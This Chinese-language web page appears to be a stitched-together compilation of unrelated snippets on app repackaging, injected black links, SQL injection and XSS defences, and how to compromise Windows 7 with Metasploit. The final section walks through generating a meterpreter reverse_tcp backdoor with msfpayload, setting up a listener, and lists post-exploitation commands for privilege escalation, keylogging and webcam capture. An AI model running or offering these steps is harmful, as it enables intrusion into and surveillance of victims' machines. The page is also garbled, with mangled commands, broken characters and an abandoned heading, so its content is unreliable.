app的服务器被黑客链接,怎么办

APP二次包装。

现在移动互联网的应用复盖了整个行业，其中也有很多投机家，他们的开发经费不够，想以最低的成本运营市场上的起爆产品，所以开始了APP解读的想法。他们雇用黑客，反译APP，修改重要代码和服务器的连接方式，重新包装，最后签字，生成与原创相同的应用。然后向一些不正当的渠道公布谋取利益。此外，还有一些黑色组织在破解应用程序后添加恶意代码，如获取相册数据、获取地址簿和短信数据，以及高级黑客技术监控银行账户等敏感信息。解决方案:APP的唯一标志是签名，开发团队和开发公司可以追加防止二次包装的相关代码，可以预防一些小毛贼。目前，国内主流软件分发平台也对APP进行了盗版识别，但由于疏忽，盗版APP、木马式APP蔓延开来。如果想以更高效的方式解读APP的话，建议咨询网站安全公司，加强APP本身的安全性，大幅度增加了编译、调整和二次包装的难易度。

拦截重要函数。

插件技术的本质是通过拦截APP软件的重要函数，模拟APP客户端，欺骗服务器发送虚假数据的手段。例如，疯狂的红包软件，其原理是利用HOOK技术拦截红包函数，制作插件与APP函数对接，达到插件的目的，一些大型APP软件具有HOOK识别机制，但大多数APP仍然没有保护的概念。解决方案:混淆或加密关键函数或代码执行过程。

敏感信息泄露。

许多开发人员认为APP移动软件安全性高，不太重视客户端的安全。出乎意料的是，黑客渗透方式的方法超出了想象。通常，他们会编译APP软件可以阅读的代码，从中提取敏感的信息，如通信密钥、客户加密算法、常量数据等。拥有这些重要数据后，根据数据通信协议进行网络渗透，最后侵入服务器。解决方案:一定要混淆、分割、重组重要信息，安全无小事。如果开发团队不太了解如何操作，请与我们商量，对APP进行全面的安全评价，以黑客的想法对软件运行的各个环节进行渗透型测试攻击，挖掘APP存在的漏洞和风险。

通信协议解读。

网站被黑客攻击，首页源代码中好多链接，怎么办

删除就可以了。挂的黑链，想彻底删除，你得找出shell在那里。然后删除掉，修复漏洞。

阻止黑客注入链接

构建安全服务器环境，构筑黑客攻击第一链条。但构建安全的服务器环境来抵御“黑客”攻击，其涉及面相当广，但就中小型网站而言，大致可从三个方面来进行：（一）：技术层面：采用软硬件防火墙、杀毒软件、页面防篡改系统来建立一个结构上较完善的Web服务器环境；（二）：服务方面，进行网络拓扑分析、建立中心机房管理制度、建立操作系统以及防病毒软件定期升级机制、对重要服务器的访问日志进行备份，通过这些服务，增强网络的抗干扰性；（三）：支持方面，要求服务商提供故障排除服务，以提高网络的可靠性。但目前大多数中小型网站都是以虚拟主机的形式托管的，要提高网站安全性，降低黑客攻击风险，网站管理员就应及时给自己的网站程序打上最新的补丁，在开发的时候应加强安全意识，注意防止注入漏洞、上传漏洞等问题，同时把网站托管在技术实力强、安全系数高、能主动帮客户解决安全的服务商处，以确保网站安全运行环境的安全。专家支招二：重视网站系统安全，布控第二把锁构建安全服务器的环境，只是从外围进行阻击“黑客”的攻击，但更重要的还是要保障网站系统安全，防止黑客利用系统漏洞进行攻击，从而威胁网站安全。据动易公司网络安全专家介绍：根据2007年 OWASP 组织发布的 Web 应用程序脆弱性10大排名的统计结果表明，跨站脚本、注入漏洞、跨站请求伪造、信息泄露等方面的问题仍然是目前黑客流行的攻击方式，而其中尤以SQL注入攻击和跨站脚本攻击为重，所谓的SQL注入攻击就是利用程序员在编写代码时没有对用户输入数据的合法性进行判断，导致入侵者可以通过插入并执行恶意SQL命令，获得数据读取和修改的权限；而跨站脚本攻击则是通过在网页中加入恶意代码，当访问者浏览网页时，恶意代码会被执行或者通过给管理员发信息的方式诱使管理员浏览，从而获得管理员权限，控制整个网站。那么，对这种黑客攻击方式有没有有效的安全手段进行阻击呢？据悉，在SiteFactory�6�4 内容管理系统开发中，针对各种攻击方式都制定了相应完整的防御方案，并且借助 ASP.NET 的特性和功能，可以有效的抵制恶意用户对网站进行的攻击，提高网站的安全性，但就针对目前SQL注入攻击和跨站脚本攻击，其更加有效的阻击手段是什么呢？为此，我们向动易网络安全专家了解，他向我们介绍了一些安全手段：（一）对于SQL注入攻击：动易系统采用对SQL查询语句中的查询参数进行过滤；使用类型安全的SQL参数化查询方式，从根本上解决SQL注入的问题；URL参数类型、数量、范围限制功能，解决恶意用户通过地址栏恶意攻击的问题等，这些手段是控制SQL注入的，还包括其它的一些过滤处理，和其它的对用户输入数据的验证来防止SQL注入攻击。（二）：对于跨站脚本攻击：在对于不支持HTML的内容直接实行编码处理的办法，来从根本上解决跨站问题。而对于支持Html的内容，我们有专门的过滤函数，会对数据进行安全处理（依据XSS攻击库的攻击实例），虽然这种方式目前是安全的，但不代表以后也一定是安全的，因为攻击手段会不断翻新，我们的过滤函数库也会不断更新。另外对于外站访问和直接访问我们也做了判断，从一定程度上也可以避免跨站攻击。即使出现了了跨站攻击，我们也会将攻击的影响减到最小：一、对于后台一些会显示HTML内容的地方，通过frame的安全属性security="restricted"来阻止脚本的运行（IE有效）；二、使用Cookie的HttpOnly属性来防止Cookie通过脚本泄密（IE6 SP1以上、Firefox 3）；三、身份验证票据都是加密过的；四、推荐使用更高版本的IE或者FF。

看黑客怎么使用Metasploit进行渗透windows7的

很多朋友对使用Metasploit利用后门程序进行渗透windows7都比较感兴趣，针对这些以下业内相关专家就给大家介绍下，当下黑客怎么利用Metasploit进行渗透windows7的。设定目标主机为：cn_win7_x86_7601虚拟机，地址为：192.168.0.116；而本地主机就为：192.168.0.149。方法步骤一：黑客用Msfpayload直接生成相关的后门程序，如下图。sfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.0.149xsteup.exe方法步骤二：黑客直接就能进入所在的目录并将属性进行修改，换为允许以程序执行文件，详细如下图。进入所在目录，修改属性：选择“允许以程序执行文件”,这时候也可以做一些免杀方法步骤三：接着黑客就打开msfconsole并加载exploit/multi/handler模块并进行设置本地主机，最后就能开始进行监听了，详细情况如下图。打开msfconsole，加载exploit/multi/handler模块，设置本地主机；然后开始监听：exploit-z-j：方法步骤四：黑客需要能将程序直接拷贝都目标主机中并进行执行。方法步骤五：以上步骤全部完成后黑客就能通过后门程序反向连接到msf，用msf就能发起第2次的攻击然后使用客户端也就是后门程序就能连接都服务端msf，详细的如下图。Meterpreter就是metasploit框架中的一个扩展模块，因此的话溢出成功后黑客就能攻击载荷进行使用，一旦攻击载荷在溢出攻击成功后就能再返回一个控制通道，这样就能将它作为攻击载荷成功获得目标系统的一个meterpretershell的链接。另外，附meterpreter常用命令：getsystem#会自动利用各种各样的系统漏洞来进行权限提升migrate#进程id进程迁移background#把当前的会话设置为背景，需要的时候在启用getuid#查看对方正在运行的用户ps#列出所有的进程getpid#返回运行meterpreter的id号sysinfo#产看系统信息和体系结构shell#切换到cmd的系统权限方式exit#退出shell会话返回meterpreter或终止meterpretergetdesktop截取目标主机当前桌面会话窗口runwebcam-p/var/www#在/var/www目录监控目标主机的摄像头keylog_recorder#使用migrate将会话迁移至explorer.exe的进程空间后记录键盘